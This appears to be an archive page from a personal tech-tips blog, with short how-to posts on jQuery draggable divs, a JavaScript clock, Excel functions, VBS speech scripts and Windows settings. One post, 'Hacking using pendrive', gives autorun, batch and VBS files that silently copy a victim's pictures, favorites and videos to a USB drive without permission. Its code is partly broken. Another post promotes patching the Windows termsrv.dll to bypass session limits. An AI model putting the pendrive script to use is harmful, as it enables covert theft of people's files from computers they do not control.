Wednesday, 21 September 2016

How to make my div containers movable within an HTML page?

Dear Friends,
Dhurima Blog presents, How to make my div containers movable within an HTML page?
If you Say, it's very Difficult, then you are wrong. It's so easy man. just follow given Steps:
Click for Demo Page

Step 1: Choose where you want to use it. We suppose you want to add  under a Contact Page.
Step 2: If You add this on your Website, then 

  1. First Copy below script and css and paste under head tag.
<head>
<link href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/themes/smoothness/jquery-ui.css" rel="stylesheet" type="text/css"/>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
    <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js"></script>
    
    <style>
        #divContainer, #divResize { 
            border:dashed 1px #CCC; 
            width:120px; 
            height:120px; 
            padding:5px; 
            margin:5px; 
            font:13px Arial; 
            cursor:move; 
            float:left 
        } 
    </style>
</head>

  1. Now Copy below code and Paste where you want add movable div under Body tag.
  2. <body>
     <div>
            <div id="divContainer"> 
                I am Draggable 
            </div>
            <div id="divResize">
                I am Draggable and Resizable 
            </div>
     </div>
    </body>
    Note: Here is 2 div first for Draggable and second for Draggable and Resizable both. If you want to add only one then just remove another.  
  3. Now Copy below script code and Paste below body Tag and just top of the HTML closing Tag.
  4. <script>
        $(document).ready(function() {
            $(function() { $('#divContainer').draggable(); });
            $(function() { $("#divResize").draggable().resizable(); });
        });
    </script>
    </html>
  5. Save your HTML File and Run your file. That's it for Website.
Step 3: If You add this on your Blogger, then 
  1. Go to Blogger Dashboard --> Click on 'Template' --> Click on 'Edit HTML'
  2. Copy below script and css  link and paste under below of head tag.
  3. <link href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/themes/smoothness/jquery-ui.css" rel="stylesheet" type="text/css"/>
        <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js"></script>
  4. Now Go to Blogger Dashboard --> Click on 'Template' -->  Click on 'Customise' --> Click on 'Advanced' --> Click on 'Add CSS'. Under the Opened CSS Box, Just Copy and Past Below CSS code. According to your Choice you can Change it.
  5. #divContainer, #divResize { 
                border:dashed 1px #CCC; 
                width:120px; 
                height:120px; 
                padding:5px; 
                margin:5px; 
                font:13px Arial; 
                cursor:move; 
                float:left 
            } 
  6. Now Copy below code and Paste where you want add movable div. You Can Use Add Gadget for it. 
  7.  <div>
            <div id="divContainer"> 
                I am Draggable 
            </div>
            <div id="divResize">
                I am Draggable and Resizable 
            </div>
     </div>
    <script>
        $(document).ready(function() {
            $(function() { $('#divContainer').draggable(); });
            $(function() { $("#divResize").draggable().resizable(); });
        });

    </script>

If You like this Post, Please Like my Blog Comment on this post and Visit my another post. Visit my Facebook Page
That's It

Tuesday, 20 September 2016

How to add Clock in your Google Blog.

Hello Friends,
Manish Chaturvedi Blog presents, Digital Clock for your Google Blog. 
If you want to add Digital Clock in your Blog, then you can  easily place the HTML Code and Add like as a Gadget. Just follow the steps.

Step 1: Go to your Blogger Dashboard(go to https://www.blogger.com/ and Login with your Gmail ID and Password.)
Step 2: Select your Blog.
Step 3: Under Dashboard Click on the Layout Tab.
Step 4: After That, Click on 'Add a Gadget' tab.
Step 5: Under Gadget Gallery, Search and Click on 'HTML/JavaScript'.
Step 6: After Clicked on 'HTML/JavaScript' you can see one window like below image.

Step 6: In Opened Window Write 

  1. Title: Digital Clock
  2. Content: Under Content Just Copy paste Digital Clock Code written below:

<script type="text/javascript">
tday=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday");
tmonth=new Array("January","February","March","April","May","June","July","August","September",
"October","November","December");

function GetClock(){
var d=new Date();
var nday=d.getDay(),nmonth=d.getMonth(),ndate=d.getDate(),nyear=d.getYear();
if(nyear<1000) nyear+=1900;
var nhour=d.getHours(),nmin=d.getMinutes(),nsec=d.getSeconds(),ap;

if(nhour==0){ap=" AM";nhour=12;}
else if(nhour<12){ap=" AM";}
else if(nhour==12){ap=" PM";}
else if(nhour>12){ap=" PM";nhour-=12;}

if(nmin<=9) nmin="0"+nmin;
if(nsec<=9) nsec="0"+nsec;

document.getElementById('clockbox').innerHTML=""+tday[nday]+", "+tmonth[nmonth]+" "+ndate+", "+nyear+" ; "+nhour+":"+nmin+":"+nsec+ap+"";
}

window.onload=function(){
GetClock();
setInterval(GetClock,1000);
}
</script>

Step 7: After copy paste code just click on save button.  
Step 8: Rearrange your Digital Clock Gadget as you want. 
Step 9: Click on Save arrangement at the Top-Right Corner.
Step 10: Now Open your Website. Look your Website have a Digital Clock.

If You like this Post, Please Like my Blog Comment on this post and Visit my another post. Visit my Facebook Page
That's it.

Monday, 29 August 2016

Find your screen resolution in HTML

Hello friends,
If you want to create any website which screen resolution change according to computer screen resolution which is use by user, then you have to find out what is users screen resolution. Is it so difficult?
If you asked with me, then we can say no, it is not difficult. It is so easy man. 
Just copy paste below Code in Your Page:  

<button onclick="myFunction()">Click to find Now</button>
<p id="width"></p>
<p id="height"></p>

<script>
function myFunction() {
    var x = "Total Width: " + screen.width + "px";
    document.getElementById("width").innerHTML = x;
    var y = "Total height: " + screen.height + "px";
    document.getElementById("height").innerHTML = y;
}</script>

Full Code example:
Here we are sharing full HTML code. just copy this HTML code and Paste it on Notepad.

<!DOCTYPE html>
<html>
<body>

<p>Click the button to display the total width of your screen, in pixels and the total height of your screen, in pixels.</p>

<button onclick="myFunction()">Click to find Now</button>

<p id="width"></p>
<p id="height"></p>
<script>
function myFunction() {
    var x = "Total Width: " + screen.width + "px";
    document.getElementById("width").innerHTML = x;
    var y = "Total height: " + screen.height + "px";
    document.getElementById("height").innerHTML = y;
}
</script>

</body>
</html>

After That Save it as "screen_resolution.HTML" and Select Save as Type " All Files
Result:
Result of screen resolution

That's It...

Monday, 13 June 2016

How to logging two Sessions on same Windows machine at the same time

1. Download the Universal Termsrv.dll Patch and unzip it.
2. Select UniversalTermsrvPatch-x64.exe for 64bit OS. And Select UniversalTermsrvPatch-x86.exe for 32bit OS.
3. Right click and Run as Administrator


4. Click the Patch button to patch the DLL and click OK on the success window.



5. Restart your machine for the changes to take effect.



Note: you can visit the main website also click here.

Wednesday, 6 April 2016

How to remove read-only When multiple users open same document?

I have an excel 2007 file sitting in a shared network folder. I only want one user to be able to make changes at a time (any other users would get a read-only). For some reason it currently does not do this, and I have multiple users with the same doc open. I'm concerned that changes will get over-written when 2 people are saving their changes. Can anyone help me with the settings for this.

Step 1: Open Excel file.
Step 2: Press Alt + T, b for open share Workbook window.
Step 3: Please Tick for Allow Changes by more than 1 user at the same time.

Step 4: Click OK.


Thats it...

Wednesday, 23 December 2015

how to enable ctrl+alt+del logon in windows 7

Dear All,
If you want to Enable Ctrl + Alt + Del to logon in window 7, then follow given step
  1. Press Window + R button (for Run Command)
  2. Write netplwiz in textbox and click ok button.
  3. Click the Advanced tab, select the Require users to press Ctrl+Alt+Delete check box, and then click OK.
Now Check your logon window it's change like you want.

Friday, 20 November 2015

Important Information about Facebook Profile

Dear All,
On the behalf of Jay kumar Mishra (Kamlesh Mishra), I want to give an important information, which is written below in his own words.
"Dear all,
My Facebook profile has been hacked from 19th-Nov-2015, 03:00 PM Approx. So please ignore the messages sent. I'll conform you when I retrieve my account.
Hacker call me from given below no detail.
Number: 8058080560
Company: Idea
Location: Rajasthan
Regards,
Jay kumar Mishra(Kamlesh Mishra)"
Dear friends, Please read this message and share it. thanks
Reards
Manish Chaturvedi
Admin of Manish chaturvedi blog

Tuesday, 6 October 2015

DATEDIF function to Calculate Difference of two Dates


Dear all,
Today we are going to share one excel Worksheet function named DATEDIF function, which is returns the difference between two date values. Using this formula we are going to find Age in Year, month and Day.

SYNTAX

 DATEDIF( start_date, end_date, interval )

Parameters

start_date and end_date : start_date and end_date is the two dates to calculate the difference between.

Interval

Interval
Explanation
Y
The number of complete years.
M
The number of complete months.
D
The number of complete days.
MD
The difference between the days (months and years are ignored).
YM
The difference between the months (days and years are ignored).
YD
The difference between the days (years and dates are ignored).

For Example:

Using this formula we are going to find Age in Year, month and Day.



Calculation for B3 that’s mean for Year

Simply formula is
                = DATEDIF(A3,TODAY(),"Y")
                =26
If we want to result like ‘26 Year’ then,
                = DATEDIF(A3,TODAY(),"Y")&"  Year"
                =26 Year
If we want to Result is ‘No DOB’, if A3 Cell is Blank then,
                =IF(A3=0,"No DOB",DATEDIF(A3,TODAY(),"Y")&"  Year")
                =26 Year

Calculation for C3 that’s mean for Month

Simply formula is
                = DATEDIF(A3,TODAY(),"YM")
                =4
If we want to result like ‘26 Year’ then,
                = DATEDIF(A3,TODAY(),"YM")&"  Month"
                =4 Month
If we want to Result is ‘No DOB’, if A3 Cell is Blank then,
                =IF(A3=0,"No DOB", DATEDIF(A3,TODAY(),"YM")&"  Month")
                =4 Month

Calculation for D3 that’s mean for Day

Simply formula is
                =DATEDIF(A3,TODAY(),"MD")
                =25
If we want to result like ‘26 Year’ then,
                =DATEDIF(A3,TODAY(),"MD")&"  Day"
                =25 Day
If we want to Result is ‘No DOB’, if A3 Cell is Blank then,
                =IF(A3=0,"No DOB",DATEDIF(A3,TODAY(),"MD")&"  Day")
                =25 Day

Idea is taken by Tech on The Net


Saturday, 22 August 2015

Make your Computer Welcome You

Hello Everyone,
  If you want Make your Computer Welcome You then, use this trick, follow the instructions given below:-


Steps
  1. Open Notepad.
  2. Copy and paste the exact code given below.  
  3. Dim speaks, speech speaks="Welcome to your PC, Username" Set speech=CreateObject("sapi.spvoice") speech.Speak speaks

  4. Replace Username with your own name.
  5.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
  6. Copy the saved file.
  7. Navigate to

    For Window XP: C:\Documents and Settings\All Users\Start Menu\Programs\Startup 

     and For Windows 8, Windows 7 and Windows Vista: C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

    if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.

  8.  Paste the file.
Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Make your Computer Talk

Hello Everyone,
  If you want to create one such talk script, follow the steps given below.


Steps
  1. Open Notepad.
  2. Copy and paste the exact code given below.  
  3. Dim Message, Speak Message=InputBox("Enter text","Speak") Set Speak=CreateObject("sapi.spvoice") Speak.Speak Message

  4. Click on File MenuSave As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
  5. Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.
That's it your Software for Speaking your Text to read.

   

Hacking using pendrive

This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice.

Process is very simple as we have to add only 4-5 notepad files in the flash drive.
Follow the following steps :-

1. Create a notepad file with name 
autorun.inf nad copy the following code.



[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
2. Create another notepad file of name file.bat and copy the following code.

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls
3. In our 3rd notepad file, copy the following code and save it as invisible.vbs


CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

4. And in our last notepad file, copy this code and save the file as 
launch.bat


 wscript.exe \invisible.vbs file.bat

5. Now, copy all this 4 files in the root of  flash drive. And create a folder "all" where the content is to be copy.

6. Test this in your own computer first, before inserting this flash drive in victim's computer.


This code is writen by hacking using pendrive site click for more detail.

Want to Use Your Pen Drive As RAM ?

Hello Everyone,
If you want to use your Pen Drive as a RAM of your PC or Laptop then just use given below steps. 
  1. Insert the Pen Drive with 1GB at least in the USB Port, better to prefer 4GB.
  2. Right click on My Computer--> Properties--> Advanced system settings.
  3. Advanced--> Performance Settings.
  4. Advanced--> Change.
  5. Dis Select Automatically manage paging file size for all drives paging file size for each drive.
  6. Select your pen Drive (Suppose your pen drive is in G Drive Then Select G). 
  7. Click on Custom Size.  "Check the value of space available"
  8. Enter the same in the Initial and Max columns. "Here you just used the space of Pen Drive as a Virtual Memory".
  9. Now restart your PC.

Finally check the general start up time and also speed of your PC. So, you can have a high speed system in low cost.

Here Your pen drive is now a RAM you can Check your RAM Size using My Computer--> Properties Location.
That's it...

Friday, 14 August 2015

Recover my pen drive data which shows as empty

Hello Everyone,

Check if the files are not in hidden mode. 

Click on "Start" -->Run --> Type cmd and press Enter. 

Here I assume your pendrive drive letter as G: 

Enter this command. 

attrib -h -r -s /s /d g:\*.* --> Press Enter 

You can copy the above command --> Right-click in the Command Prompt and 

paste it. 

Note : Replace the letter g with your pen drive letter. 

Now check your pen drive for the files. 

Best of luck...

Monday, 25 May 2015

Restrict Desktop Wallpaper Change

Hello Everyone,
     If you Really want to restrict your Desktop wallpaper for any other user on your computer, Then go through the following step:

  1.  Click start --> Run . and type gpedit.msc and click ok
  2. Navigate to --> Configuration\Administrative Templates\Desktop\Active Desktop\Active Desktop Wallpaper [[Specifies the desktop background ("wallpaper") displayed on all users' desktops.]]
  3. Navigate to --> User Configuration\Administrative Templates\Control Panel|Display\Desktop
    Themes\Remove Theme Option [[If you enable this setting, it removes the Themes tab.]]

Saturday, 24 January 2015

Screen Recorder with Audio and Video

Hello Everyone,
        Want to any idea about Record your Computer Desktop work with audio and your face, then just use this step.
Step 1: Go to bbflashbackexpress Website and follow the step.
or
Download this from given link.
Its free..


Thanks....

Tuesday, 16 December 2014

Information about Notepad

Hi friends,
here I am giving you a PPT of Notepad. See PPT and know about Notepad.



Add Live Chat box on Your Web Site

hello today i am given you a best live chat integration that is Called Zopim live Chat. Go to Official website of Zopim And Follow this step:

Step 1:  Register in Zopim live chat
             for registration go to Zopim Registration page

Computer basic

Hi friends,
here I am giving you a PPT of Computer Basic. See PPT and know about Computer basic

Monday, 20 October 2014

Allow user to Edit Excel Sheet cell in Read only Sheet

Question: 

Can I set any particular cell in a read only sheet for Editable in a Excel Sheet?

Answer: 

Yes, It is possible by using "Allow Users to Edit Ranges" link on Excel. We Provide you step by step process of Editable cell in a read only sheet.
First we sure that your Sheet is not a read only on the time of using this process. Process is given below:
  • go to Review tab => Changes => Allow uses to Edit Ranges
  • In Allow users to Edit Ranges Click on New Button
  • On New Range window and fill the detail.
      
    Title: Give the Title as you want,
    Refers to cells: Give the Cell name that you want to allow for Editing
    Range Password: If we want to edit range with password.
    and the click OK Button.
  •  Now Click on Permissions Button on  Allow uses to Edit Ranges Window.
    Now click on add Button.
  • Enter your Computer user name for permission or Write "Everyone" on "Enter the object name to select" and click on "Check Names" Button.
    and click OK Button.
  • Now use Apply and OK Button to all opened window.
  • Now go to Review tab => Changes =>Protect Sheet
  •  Now Click OK Button. 
  • that's it your all sheet cell is read only except your range that you want.
     

Search on This Blog